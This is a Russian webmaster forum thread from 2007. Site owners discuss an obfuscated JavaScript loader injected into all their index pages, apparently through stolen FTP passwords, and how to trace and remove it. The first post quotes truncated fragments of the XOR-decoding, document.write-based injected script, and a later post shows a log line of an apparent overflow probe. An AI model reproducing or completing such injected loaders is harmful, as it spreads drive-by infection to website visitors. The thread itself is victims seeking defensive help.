Вирус!! Заразились все сайты

12 3
sud falke
На сайте с 24.11.2006
Offline
60
3498

Кто-нибудь сталкивался с этим?

<!--<S>--><script>try {function yb(pa){return parseInt(pa)}var AF='66u6lu6qu6Fu6Zu6

.......................

(gf=0;gf<jP.length;gf+=2){Ha=jP.substr(gf,2);for(lD=0;lD<AF.length;lD++){if(AF[lD]==Ha)break;} EX+=String.fromCharCode(CQ[lD]^145);}document.write(EX);}

catch(e){}</script><!--</S>-->

Люблю эту компанию Venta (http://www.promo-venta.ru)
Xover
На сайте с 22.05.2006
Offline
101
#1

меняй пароли на фтп, icq... на все в общем.

сплойт.

Покупаю внутренние PR4 на sape.ru (http://www.sape.ru/r.f3cfb23480.php)
T
На сайте с 11.08.2005
Offline
181
#2
Xover:
меняй пароли на фтп, icq... на все в общем. сплойт.

Только перед этим проверьте компьютер на вирусы. У Вас, скорее всего, троян завелся, который и увел Ваши пароли.

Подобные темы в последнее время поднимаются почти каждый день.

sud falke
На сайте с 24.11.2006
Offline
60
#3
Timen:
Только перед этим проверьте компьютер на вирусы. У Вас, скорее всего, троян завелся, который и увел Ваши пароли. Подобные темы в последнее время поднимаются почти каждый день.

Этот скрипт на всех сайтах в коде index после </html>, в подпапки не пробрался. Проверял у себя машину NOD32 с последними обновлениями, ничего не нашел. В процесах тоже вроде все нормально. Подскажите как этот троян выследить

S
На сайте с 17.10.2003
Offline
332
#4
sud falke:
Этот скрипт на всех сайтах в коде index после </html>, в подпапки не пробрался. Проверял у себя машину NOD32 с последними обновлениями, ничего не нашел. В процесах тоже вроде все нормально. Подскажите как этот троян выследить

А у кого-нибудь еще кроме вас (администраторы, дизайнеры, админы и т.д.) есть доступ к фтп?

Не все ссылки одинаково полезны ( https://www.svift.org/ ). Тут заказываю комментарии и отзывы ( https://qcomment.ru/ref/5651 ) для своих сайтов
sud falke
На сайте с 24.11.2006
Offline
60
#5
svift:
А у кого-нибудь еще кроме вас (администраторы, дизайнеры, админы и т.д.) есть доступ к фтп?

Нет, доступ только у меня. Вирусняк пришел извне, точно. Троян, спер ftp пароли из total commander передал куда надо и оттуда скрипт навтыкал эту годость во все index.*

D
На сайте с 14.01.2007
Offline
153
#6

знакомая S.

недавно кто-то в курилке похожий "закодированный" код постил.

в конце концов всё равно создавался ифрейм.

если интересно могу в личку кинуть урл сайта, откуда тянулся ифрейм. можете со своим сравнить.

S
На сайте с 17.10.2003
Offline
332
#7
sud falke:
Вирусняк пришел извне, точно

Ну это понятно, что не сами вы его создали... а браузером вы каким пользовались последнее время? Софт сомнительного характера ставили?

sud falke
На сайте с 24.11.2006
Offline
60
#8
svift:
Ну это понятно, что не сами вы его создали... а браузером вы каким пользовались последнее время? Софт сомнительного характера ставили?

C одним проектом были проблемы, но не такие. Как раз его смотрел в IE, проверял как стили смотрятся. Да смысл не в том откуда он пришел. Как убрать и предотвратить дальнейшее проявление?

Dinozavr, если не трудно скиньте

S
На сайте с 17.10.2003
Offline
332
#9
sud falke:
Как убрать и предотвратить дальнейшее проявление?

Вот как раз для того чтобы предотвратить дальнейшее появление и необходимо выяснить источник инфицирования

VE
На сайте с 17.08.2006
Offline
76
#10
svift:
Ну это понятно, что не сами вы его создали... а браузером вы каким пользовались последнее время? Софт сомнительного характера ставили?

Поставилось avstat - нашлось кучка неприглядного, но не лезушщего в инет.

Софт старый - некромансер я по меркам неофитов - с крутыми машинами - на 3.11 еще в нет ходим (на определенный момент :). Фар, с которого уже никто не сопроет, бат, который 1.все забыли, опера 3-7 версий, нотетаб для текста, еще пару тройку приблуд.

Но, есть параллельный вопрос. Замечено но не часто, пропускаемо ZoneAlarm такая фича, под вынь 2000 - где могло засесть, кто и чего хочет?

---

82.209.232.153 - - [19/Apr/2007:00:39:54 +0300] "SEARCH /_ЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙЙ....

----

Помогите, плз.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий